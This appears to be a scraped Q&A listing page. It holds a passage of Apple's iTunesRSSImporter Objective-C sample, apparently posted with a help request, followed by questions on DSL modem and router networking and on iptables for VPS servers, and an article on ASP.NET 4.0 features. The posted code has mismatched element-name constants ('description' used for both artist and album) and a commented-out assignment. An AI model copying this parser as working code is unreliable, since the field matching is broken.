OR PROFITS; OR BUSINESS INTERRUPTION) ARISING IN ANY WAY OUT OF THE USE, REPRODUCTION, MODIFICATION AND/OR DISTRIBUTION OF THE APPLE SOFTWARE, HOWEVER CAUSED AND WHETHER UNDER THEORY OF CONTRACT, TORT (INCLUDING NEGLIGENCE), STRICT LIABILITY OR OTHERWISE, EVEN IF APPLE HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. Copyright (C) 2009 Apple Inc. All Rights Reserved. */ #import "iTunesRSSImporter.h" #import "Song.h" #import "Category.h" #import "CategoryCache.h" #import <libxml/tree.h> // Function prototypes for SAX callbacks. This sample implements a minimal subset of SAX callbacks. // Depending on your application's needs, you might want to implement more callbacks. static void startElementSAX(void *context, const xmlChar *localname, const xmlChar *prefix, const xmlChar *URI, int nb_namespaces, const xmlChar **namespaces, int nb_attributes, int nb_defaulted, const xmlChar **attributes); static void endElementSAX(void *context, const xmlChar *localname, const xmlChar *prefix, const xmlChar *URI); static void charactersFoundSAX(void *context, const xmlChar *characters, int length); static void errorEncounteredSAX(void *context, const char *errorMessage, ...); // Forward reference. The structure is defined in full at the end of the file. static xmlSAXHandler simpleSAXHandlerStruct; // Class extension for private properties and methods. @interface iTunesRSSImporter () @property BOOL storingCharacters; @property (nonatomic, retain) NSMutableData *characterBuffer; @property BOOL done; @property BOOL parsingASong; @property NSUInteger countForCurrentBatch; @property (nonatomic, retain) Song *currentSong; @property (nonatomic, retain) NSURLConnection *rssConnection; @property (nonatomic, retain) NSDateFormatter *dateFormatter; // The autorelease pool property is assign because autorelease pools cannot be retained. @property (nonatomic, assign) NSAutoreleasePool *importPool; @end static double lookuptime = 0; @implementation iTunesRSSImporter @synthesize iTunesURL, delegate, persistentStoreCoordinator; @synthesize rssConnection, done, parsingASong, storingCharacters, currentSong, countForCurrentBatch, characterBuffer, dateFormatter, importPool; - (void)dealloc { [iTunesURL release]; [characterBuffer release]; [currentSong release]; [rssConnection release]; [dateFormatter release]; [persistentStoreCoordinator release]; [insertionContext release]; [songEntityDescription release]; [theCache release]; [super dealloc]; } - (void)main { self.importPool = [[NSAutoreleasePool alloc] init]; if (delegate && [delegate respondsToSelector:@selector(importerDidSave:)]) { [[NSNotificationCenter defaultCenter] addObserver:delegate selector:@selector(importerDidSave:) name:NSManagedObjectContextDidSaveNotification object:self.insertionContext]; } done = NO; self.dateFormatter = [[[NSDateFormatter alloc] init] autorelease]; [dateFormatter setDateStyle:NSDateFormatterLongStyle]; [dateFormatter setTimeStyle:NSDateFormatterNoStyle]; // necessary because iTunes RSS feed is not localized, so if the device region has been set to other than US // the date formatter must be set to US locale in order to parse the dates [dateFormatter setLocale:[[[NSLocale alloc] initWithLocaleIdentifier:@"US"] autorelease]]; self.characterBuffer = [NSMutableData data]; NSURLRequest *theRequest = [NSURLRequest requestWithURL:iTunesURL]; // create the connection with the request and start loading the data rssConnection = [[NSURLConnection alloc] initWithRequest:theRequest delegate:self]; // This creates a context for "push" parsing in which chunks of data that are not "well balanced" can be passed // to the context for streaming parsing. The handler structure defined above will be used for all the parsing. // The second argument, self, will be passed as user data to each of the SAX handlers. The last three arguments // are left blank to avoid creating a tree in memory. context = xmlCreatePushParserCtxt(&simpleSAXHandlerStruct, self, NULL, 0, NULL); if (rssConnection != nil) { do { [[NSRunLoop currentRunLoop] runMode:NSDefaultRunLoopMode beforeDate:[NSDate distantFuture]]; } while (!done); } // Display the total time spent finding a specific object for a relationship NSLog(@"lookup time %f", lookuptime); // Release resources used only in this thread. xmlFreeParserCtxt(context); self.characterBuffer = nil; self.dateFormatter = nil; self.rssConnection = nil; self.currentSong = nil; [theCache release]; theCache = nil; NSError *saveError = nil; NSAssert1([insertionContext save:&saveError], @"Unhandled error saving managed object context in import thread: %@", [saveError localizedDescription]); if (delegate && [delegate respondsToSelector:@selector(importerDidSave:)]) { [[NSNotificationCenter defaultCenter] removeObserver:delegate name:NSManagedObjectContextDidSaveNotification object:self.insertionContext]; } if (self.delegate != nil && [self.delegate respondsToSelector:@selector(importerDidFinishParsingData:)]) { [self.delegate importerDidFinishParsingData:self]; } [importPool release]; self.importPool = nil; } - (NSManagedObjectContext *)insertionContext { if (insertionContext == nil) { insertionContext = [[NSManagedObjectContext alloc] init]; [insertionContext setPersistentStoreCoordinator:self.persistentStoreCoordinator]; } return insertionContext; } - (void)forwardError:(NSError *)error { if (self.delegate != nil && [self.delegate respondsToSelector:@selector(importer:didFailWithError:)]) { [self.delegate importer:self didFailWithError:error]; } } - (NSEntityDescription *)songEntityDescription { if (songEntityDescription == nil) { songEntityDescription = [[NSEntityDescription entityForName:@"Song" inManagedObjectContext:self.insertionContext] retain]; } return songEntityDescription; } - (CategoryCache *)theCache { if (theCache == nil) { theCache = [[CategoryCache alloc] init]; theCache.managedObjectContext = self.insertionContext; } return theCache; } - (Song *)currentSong { if (currentSong == nil) { currentSong = [[Song alloc] initWithEntity:self.songEntityDescription insertIntoManagedObjectContext:self.insertionContext]; } return currentSong; } #pragma mark NSURLConnection Delegate methods // Forward errors to the delegate. - (void)connection:(NSURLConnection *)connection didFailWithError:(NSError *)error { [self performSelectorOnMainThread:@selector(forwardError:) withObject:error waitUntilDone:NO]; // Set the condition which ends the run loop. done = YES; } // Called when a chunk of data has been downloaded. - (void)connection:(NSURLConnection *)connection didReceiveData:(NSData *)data { // Process the downloaded chunk of data. xmlParseChunk(context, (const char *)[data bytes], [data length], 0); } - (void)connectionDidFinishLoading:(NSURLConnection *)connection { // Signal the context that parsing is complete by passing "1" as the last parameter. xmlParseChunk(context, NULL, 0, 1); context = NULL; // Set the condition which ends the run loop. done = YES; } #pragma mark Parsing support methods static const NSUInteger kImportBatchSize = 20; - (void)finishedCurrentSong { parsingASong = NO; self.currentSong = nil; countForCurrentBatch++; // Periodically purge the autorelease pool and save the context. The frequency of this action may need to be tuned according to the // size of the objects being parsed. The goal is to keep the autorelease pool from growing too large, but // taking this action too frequently would be wasteful and reduce performance. if (countForCurrentBatch == kImportBatchSize) { [importPool release]; self.importPool = [[NSAutoreleasePool alloc] init]; NSError *saveError = nil; NSAssert1([insertionContext save:&saveError], @"Unhandled error saving managed object context in import thread: %@", [saveError localizedDescription]); countForCurrentBatch = 0; } } /* Character data is appended to a buffer until the current element ends. */ - (void)appendCharacters:(const char *)charactersFound length:(NSInteger)length { [characterBuffer appendBytes:charactersFound length:length]; } - (NSString *)currentString { // Create a string with the character data using UTF-8 encoding. UTF-8 is the default XML data encoding. NSString *currentString = [[[NSString alloc] initWithData:characterBuffer encoding:NSUTF8StringEncoding] autorelease]; [characterBuffer setLength:0]; return currentString; } @end #pragma mark SAX Parsing Callbacks // The following constants are the XML element names and their string lengths for parsing comparison. // The lengths include the null terminator, to ensure exact matches. static const char *kName_Item = "item"; static const NSUInteger kLength_Item = 5; static const char *kName_Title = "title"; static const NSUInteger kLength_Title = 6; static const char *kName_Category = "category"; static const NSUInteger kLength_Category = 9; static const char *kName_Itms = "itms"; static const NSUInteger kLength_Itms = 5; static const char *kName_Artist = "description"; static const NSUInteger kLength_Artist = 7; static const char *kName_Album = "description"; static const NSUInteger kLength_Album = 6; static const char *kName_ReleaseDate = "releasedate"; static const NSUInteger kLength_ReleaseDate = 12; /* This callback is invoked when the importer finds the beginning of a node in the XML. For this application, out parsing needs are relatively modest - we need only match the node name. An "item" node is a record of data about a song. In that case we create a new Song object. The other nodes of interest are several of the child nodes of the Song currently being parsed. For those nodes we want to accumulate the character data in a buffer. Some of the child nodes use a namespace prefix. */ static void startElementSAX(void *parsingContext, const xmlChar *localname, const xmlChar *prefix, const xmlChar *URI, int nb_namespaces, const xmlChar **namespaces, int nb_attributes, int nb_defaulted, const xmlChar **attributes) { iTunesRSSImporter *importer = (iTunesRSSImporter *)parsingContext; // The second parameter to strncmp is the name of the element, which we known from the XML schema of the feed. // The third parameter to strncmp is the number of characters in the element name, plus 1 for the null terminator. if (prefix == NULL && !strncmp((const char *)localname, kName_Item, kLength_Item)) { importer.parsingASong = YES; } else if (importer.parsingASong && ( (prefix == NULL && (!strncmp((const char *)localname, kName_Title, kLength_Title) || !strncmp((const char *)localname, kName_Category, kLength_Category))) || ((prefix != NULL && !strncmp((const char *)prefix, kName_Itms, kLength_Itms)) && (!strncmp((const char *)localname, kName_Artist, kLength_Artist) || !strncmp((const char *)localname, kName_Album, kLength_Album) || !strncmp((const char *)localname, kName_ReleaseDate, kLength_ReleaseDate))) )) { importer.storingCharacters = YES; } } /* This callback is invoked when the parse reaches the end of a node. At that point we finish processing that node, if it is of interest to us. For "item" nodes, that means we have completed parsing a Song object. We pass the song to a method in the superclass which will eventually deliver it to the delegate. For the other nodes we care about, this means we have all the character data. The next step is to create an NSString using the buffer contents and store that with the current Song object. */ static void endElementSAX(void *parsingContext, const xmlChar *localname, const xmlChar *prefix, const xmlChar *URI) { iTunesRSSImporter *importer = (iTunesRSSImporter *)parsingContext; if (importer.parsingASong == NO) return; if (prefix == NULL) { if (!strncmp((const char *)localname, kName_Item, kLength_Item)) { [importer finishedCurrentSong]; } else if (!strncmp((const char *)localname, kName_Title, kLength_Title)) { importer.currentSong.title = importer.currentString; } else if (!strncmp((const char *)localname, kName_Category, kLength_Category)) { double before = [NSDate timeIntervalSinceReferenceDate]; Category *category = [importer.theCache categoryWithName:importer.currentString]; double delta = [NSDate timeIntervalSinceReferenceDate] - before; lookuptime += delta; importer.currentSong.category = category; } } else if (!strncmp((const char *)prefix, kName_Itms, kLength_Itms)) { if (!strncmp((const char *)localname, kName_Artist, kLength_Artist)) { NSString *string = importer.currentSong.artist; NSArray *strings = [string componentsSeparatedByString: @", "]; //importer.currentSong.artist = importer.currentString; } else if (!strncmp((const char *)localname, kName_Album, kLength_Album)) { importer.currentSong.album = importer.currentString; } else if (!strncmp((const char *)localname, kName_ReleaseDate, kLength_ReleaseDate)) { NSString *dateString = importer.currentString; importer.currentSong.releaseDate = [importer.dateFormatter dateFromString:dateString]; } } importer.storingCharacters = NO; } /* This callback is invoked when the parser encounters character data inside a node. The importer class determines how to use the character data. */ static void charactersFoundSAX(void *parsingContext, const xmlChar *characterArray, int numberOfCharacters) { iTunesRSSImporter *importer = (iTunesRSSImporter *)parsingContext; // A state variable, "storingCharacters", is set when nodes of interest begin and end. // This determines whether character data is handled or ignored. if (importer.storingCharacters == NO) return; [importer appendCharacters:(const char *)characterArray length:numberOfCharacters]; } /* A production application should include robust error handling as part of its parsing implementation. The specifics of how errors are handled depends on the application. */ static void errorEncounteredSAX(void *parsingContext, const char *errorMessage, ...) { // Handle errors as appropriate for your application. NSCAssert(NO, @"Unhandled error encountered during SAX parse."); } // The handler struct has positions for a large number of callback functions. If NULL is supplied at a given position, // that callback functionality won't be used. Refer to libxml documentation at http://www.xmlsoft.org for more information // about the SAX callbacks. static xmlSAXHandler simpleSAXHandlerStruct = { NULL, /* internalSubset */ NULL, /* isStandalone */ NULL, /* hasInternalSubset */ NULL, /* hasExternalSubset */ NULL, /* resolveEntity */ NULL, /* getEntity */ NULL, /* entityDecl */ NULL, /* notationDecl */ NULL, /* attributeDecl */ NULL, /* elementDecl */ NULL, /* unparsedEntityDecl */ NULL, /* setDocumentLocator */ NULL, /* startDocument */ NULL, /* endDocument */ NULL, /* startElement*/ NULL, /* endElement */ NULL, /* reference */ charactersFoundSAX, /* characters */ NULL, /* ignorableWhitespace */ NULL, /* processingInstruction */ NULL, /* comment */ NULL, /* warning */ errorEncounteredSAX, /* error */ NULL, /* fatalError //: unused error() get all the errors */ NULL, /* getParameterEntity */ NULL, /* cdataBlock */ NULL, /* externalSubset */ XML_SAX2_MAGIC, // NULL, startElementSAX, /* startElementNs */ endElementSAX, /* endElementNs */ NULL, /* serror */ }; Thanks.

    Read the article

  • DSL Modem with Wireless Router

    - by David
    I have a D-Link WBR-1310 wireless router and a TP-Link TD-8616 DSL modem. My old DSL modem died recently and I got the TP-Link as a replacement. With my old DSL modem, I plugged it into the WAN port on my D-Link and I could reach the internet through wireless and through the network. However, when I plugged the new TP-Link into the WAN port, I was not able to get any internet connectivity (either on the network ports or through wireless). So I plugged my labtop directly into the TP-Link DSL modem and I was able to get internet connectivity. I'm trying to figure out why my labtop can see the internet connection, but not the D-Link router. I think that the problem is due to the IP networking. My D-Link was originally set to have IP address 192.168.1.1. According to the documentation for the TP-Link DSL modem, it uses 192.168.1.1 as its IP address. I do not believe that my old DSL modem had an IP address. I logged into my D-Link router and changed its IP address to 192.168.1.2 and restarted it. Unfortunately, I still could not see the internet from my wireless devices. I've read a few forum postings which implied that I needed to setup a "bridge" between the two networks. Does that sound correct? Why didn't my old DSL modem require a bridge? I read pg. 12-13 of my D-Link's manual and they suggest that I need to disable UPnP, DHCP, and then plug the DSL modem into one of the LAN ports on my router. I'm concerned about doing this since I don't think that the firewall will work if I plug my DSL modem into one of the LAN ports. I also have a home NAS on my network and I wouldn't want that to be available over the internet. Does anyone have any advice about how I can get my TPLink DSL modem to work with my D-Link router? Thanks!

    Read the article

  • Managing hosts and iptables in scalable architecture

    - by hakunin
    Let's say I have a load balancer in front of 3 app servers. Let's say I also have these services available at certain IPs: Postgres server Redis server ElasticSearch server Memcached server 1 Memcached server 2 Memcached server 3 So that's 6 nodes at 6 different IP addresses. Naturally, every one of my 3 app servers needs to talk to these 6 servers above. Then, to make it a bit funkier, I also have 3 worker servers. And each worker also talks to the above 6 servers, but thankfully workers and apps never need to talk to each other. Now's the kicker. Everything is on Digital Ocean VPS. What that means is: you have no private network, no private IPs. You only have separate, random IP address on each machine. You can't mask them or anything. So in order to build a secure environment I would have to configure some iptables. For example: Open app servers be accessed by load balancer server Open redis, ES, PG, and each memcached servers to be accessed by each app's IP and each worker's IP This means that every time I add an app or worker I have to also reconfigure iptables in those above 6 servers to welcome the new app or worker. Is there a way to simplify this type of setup? I was thinking — what if there was a gateway machine between apps/workers and the above 6 machines. This way all the interaction would always happen via the gateway server, and when I add a new app or worker I wouldn't need to teach the 6 servers to let it in. If I went this route, then I'd hope a small 512mb server could handle that perhaps, and there wouldn't be almost any overhead. Or would there? Please help with best way to handle this situation. I would appreciate an answer as concrete as possible. I don't think this is too specific, because this general architecture is very common, and Digital Ocean is becoming increasingly popular. A concrete solution here would be much appreciated by many.

    Read the article

  • What’s new in ASP.NET 4.0: Core Features

    - by Rick Strahl
    Microsoft released the .NET Runtime 4.0 and with it comes a brand spanking new version of ASP.NET – version 4.0 – which provides an incremental set of improvements to an already powerful platform. .NET 4.0 is a full release of the .NET Framework, unlike version 3.5, which was merely a set of library updates on top of the .NET Framework version 2.0. Because of this full framework revision, there has been a welcome bit of consolidation of assemblies and configuration settings. The full runtime version change to 4.0 also means that you have to explicitly pick version 4.0 of the runtime when you create a new Application Pool in IIS, unlike .NET 3.5, which actually requires version 2.0 of the runtime. In this first of two parts I'll take a look at some of the changes in the core ASP.NET runtime. In the next edition I'll go over improvements in Web Forms and Visual Studio. Core Engine Features Most of the high profile improvements in ASP.NET have to do with Web Forms, but there are a few gems in the core runtime that should make life easier for ASP.NET developers. The following list describes some of the things I've found useful among the new features. Clean web.config Files Are Back! If you've been using ASP.NET 3.5, you probably have noticed that the web.config file has turned into quite a mess of configuration settings between all the custom handler and module mappings for the various web server versions. Part of the reason for this mess is that .NET 3.5 is a collection of add-on components running on top of the .NET Runtime 2.0 and so almost all of the new features of .NET 3.5 where essentially introduced as custom modules and handlers that had to be explicitly configured in the config file. Because the core runtime didn't rev with 3.5, all those configuration options couldn't be moved up to other configuration files in the system chain. With version 4.0 a consolidation was possible, and the result is a much simpler web.config file by default. A default empty ASP.NET 4.0 Web Forms project looks like this: <?xml version="1.0"?> <configuration> <system.web> <compilation debug="true" targetFramework="4.0" /> </system.web> </configuration> Need I say more? Configuration Transformation Files to Manage Configurations and Application Packaging ASP.NET 4.0 introduces the ability to create multi-target configuration files. This means it's possible to create a single configuration file that can be transformed based on relatively simple replacement rules using a Visual Studio and WebDeploy provided XSLT syntax. The idea is that you can create a 'master' configuration file and then create customized versions of this master configuration file by applying some relatively simplistic search and replace, add or remove logic to specific elements and attributes in the original file. To give you an idea, here's the example code that Visual Studio creates for a default web.Release.config file, which replaces a connection string, removes the debug attribute and replaces the CustomErrors section: <?xml version="1.0"?> <configuration xmlns:xdt="http://schemas.microsoft.com/XML-Document-Transform"> <connectionStrings> <add name="MyDB" connectionString="Data Source=ReleaseSQLServer;Initial Catalog=MyReleaseDB;Integrated Security=True" xdt:Transform="SetAttributes" xdt:Locator="Match(name)"/> </connectionStrings> <system.web> <compilation xdt:Transform="RemoveAttributes(debug)" /> <customErrors defaultRedirect="GenericError.htm" mode="RemoteOnly" xdt:Transform="Replace"> <error statusCode="500" redirect="InternalError.htm"/> </customErrors> </system.web> </configuration> You can see the XSL transform syntax that drives this functionality. Basically, only the elements listed in the override file are matched and updated – all the rest of the original web.config file stays intact. Visual Studio 2010 supports this functionality directly in the project system so it's easy to create and maintain these customized configurations in the project tree. Once you're ready to publish your application, you can then use the Publish <yourWebApplication> option on the Build menu which allows publishing to disk, via FTP or to a Web Server using Web Deploy. You can also create a deployment package as a .zip file which can be used by the WebDeploy tool to configure and install the application. You can manually run the Web Deploy tool or use the IIS Manager to install the package on the server or other machine. You can find out more about WebDeploy and Packaging here: http://tinyurl.com/2anxcje. Improved Routing Routing provides a relatively simple way to create clean URLs with ASP.NET by associating a template URL path and routing it to a specific ASP.NET HttpHandler. Microsoft first introduced routing with ASP.NET MVC and then they integrated routing with a basic implementation in the core ASP.NET engine via a separate ASP.NET routing assembly. In ASP.NET 4.0, the process of using routing functionality gets a bit easier. First, routing is now rolled directly into System.Web, so no extra assembly reference is required in your projects to use routing. The RouteCollection class now includes a MapPageRoute() method that makes it easy to route to any ASP.NET Page requests without first having to implement an IRouteHandler implementation. It would have been nice if this could have been extended to serve *any* handler implementation, but unfortunately for anything but a Page derived handlers you still will have to implement a custom IRouteHandler implementation. ASP.NET Pages now include a RouteData collection that will contain route information. Retrieving route data is now a lot easier by simply using this.RouteData.Values["routeKey"] where the routeKey is the value specified in the route template (i.e., "users/{userId}" would use Values["userId"]). The Page class also has a GetRouteUrl() method that you can use to create URLs with route data values rather than hardcoding the URL: <%= this.GetRouteUrl("users",new { userId="ricks" }) %> You can also use the new Expression syntax using <%$RouteUrl %> to accomplish something similar, which can be easier to embed into Page or MVC View code: <a runat="server" href='<%$RouteUrl:RouteName=user, id=ricks %>'>Visit User</a> Finally, the Response object also includes a new RedirectToRoute() method to build a route url for redirection without hardcoding the URL. Response.RedirectToRoute("users", new { userId = "ricks" }); All of these routines are helpers that have been integrated into the core ASP.NET engine to make it easier to create routes and retrieve route data, which hopefully will result in more people taking advantage of routing in ASP.NET. To find out more about the routing improvements you can check out Dan Maharry's blog which has a couple of nice blog entries on this subject: http://tinyurl.com/37trutj and http://tinyurl.com/39tt5w5. Session State Improvements Session state is an often used and abused feature in ASP.NET and version 4.0 introduces a few enhancements geared towards making session state more efficient and to minimize at least some of the ill effects of overuse. The first improvement affects out of process session state, which is typically used in web farm environments or for sites that store application sensitive data that must survive AppDomain restarts (which in my opinion is just about any application). When using OutOfProc session state, ASP.NET serializes all the data in the session statebag into a blob that gets carried over the network and stored either in the State server or SQL Server via the Session provider. Version 4.0 provides some improvement in this serialization of the session data by offering an enableCompression option on the web.Config <Session> section, which forces the serialized session state to be compressed. Depending on the type of data that is being serialized, this compression can reduce the size of the data travelling over the wire by as much as a third. It works best on string data, but can also reduce the size of binary data. In addition, ASP.NET 4.0 now offers a way to programmatically turn session state on or off as part of the request processing queue. In prior versions, the only way to specify whether session state is available is by implementing a marker interface on the HTTP handler implementation. In ASP.NET 4.0, you can now turn session state on and off programmatically via HttpContext.Current.SetSessionStateBehavior() as part of the ASP.NET module pipeline processing as long as it occurs before the AquireRequestState pipeline event. Output Cache Provider Output caching in ASP.NET has been a very useful but potentially memory intensive feature. The default OutputCache mechanism works through in-memory storage that persists generated output based on various lifetime related parameters. While this works well enough for many intended scenarios, it also can quickly cause runaway memory consumption as the cache fills up and serves many variations of pages on your site. ASP.NET 4.0 introduces a provider model for the OutputCache module so it becomes possible to plug-in custom storage strategies for cached pages. One of the goals also appears to be to consolidate some of the different cache storage mechanisms used in .NET in general to a generic Windows AppFabric framework in the future, so various different mechanisms like OutputCache, the non-Page specific ASP.NET cache and possibly even session state eventually can use the same caching engine for storage of persisted data both in memory and out of process scenarios. For developers, the OutputCache provider feature means that you can now extend caching on your own by implementing a custom Cache provider based on the System.Web.Caching.OutputCacheProvider class. You can find more info on creating an Output Cache provider in Gunnar Peipman's blog at: http://tinyurl.com/2vt6g7l. Response.RedirectPermanent ASP.NET 4.0 includes features to issue a permanent redirect that issues as an HTTP 301 Moved Permanently response rather than the standard 302 Redirect respond. In pre-4.0 versions you had to manually create your permanent redirect by setting the Status and Status code properties – Response.RedirectPermanent() makes this operation more obvious and discoverable. There's also a Response.RedirectToRoutePermanent() which provides permanent redirection of route Urls. Preloading of Applications ASP.NET 4.0 provides a new feature to preload ASP.NET applications on startup, which is meant to provide a more consistent startup experience. If your application has a lengthy startup cycle it can appear very slow to serve data to clients while the application is warming up and loading initial resources. So rather than serve these startup requests slowly in ASP.NET 4.0, you can force the application to initialize itself first before even accepting requests for processing. This feature works only on IIS 7.5 (Windows 7 and Windows Server 2008 R2) and works in combination with IIS. You can set up a worker process in IIS 7.5 to always be running, which starts the Application Pool worker process immediately. ASP.NET 4.0 then allows you to specify site-specific settings by setting the serverAutoStartEnabled on a particular site along with an optional serviceAutoStartProvider class that can be used to receive "startup events" when the application starts up. This event in turn can be used to configure the application and optionally pre-load cache data and other information required by the app on startup.  The configuration settings need to be made in applicationhost.config: <sites> <site name="WebApplication2" id="1"> <application path="/" serviceAutoStartEnabled="true" serviceAutoStartProvider="PreWarmup" /> </site> </sites> <serviceAutoStartProviders> <add name="PreWarmup" type="PreWarmupProvider,MyAssembly" /> </serviceAutoStartProviders> Hooking up a warm up provider is optional so you can omit the provider definition and reference. If you do define it here's what it looks like: public class PreWarmupProvider System.Web.Hosting.IProcessHostPreloadClient { public void Preload(string[] parameters) { // initialization for app } } This code fires and while it's running, ASP.NET/IIS will hold requests from hitting the pipeline. So until this code completes the application will not start taking requests. The idea is that you can perform any pre-loading of resources and cache values so that the first request will be ready to perform at optimal performance level without lag. Runtime Performance Improvements According to Microsoft, there have also been a number of invisible performance improvements in the internals of the ASP.NET runtime that should make ASP.NET 4.0 applications run more efficiently and use less resources. These features come without any change requirements in applications and are virtually transparent, except that you get the benefits by updating to ASP.NET 4.0. Summary The core feature set changes are minimal which continues a tradition of small incremental changes to the ASP.NET runtime. ASP.NET has been proven as a solid platform and I'm actually rather happy to see that most of the effort in this release went into stability, performance and usability improvements rather than a massive amount of new features. The new functionality added in 4.0 is minimal but very useful. A lot of people are still running pure .NET 2.0 applications these days and have stayed off of .NET 3.5 for some time now. I think that version 4.0 with its full .NET runtime rev and assembly and configuration consolidation will make an attractive platform for developers to update to. If you're a Web Forms developer in particular, ASP.NET 4.0 includes a host of new features in the Web Forms engine that are significant enough to warrant a quick move to .NET 4.0. I'll cover those changes in my next column. Until then, I suggest you give ASP.NET 4.0 a spin and see for yourself how the new features can help you out. © Rick Strahl, West Wind Technologies, 2005-2010Posted in ASP.NET  

    Read the article

< Previous Page | 63 64 65 66 67 68 69 70 71 72 73 74  | Next Page >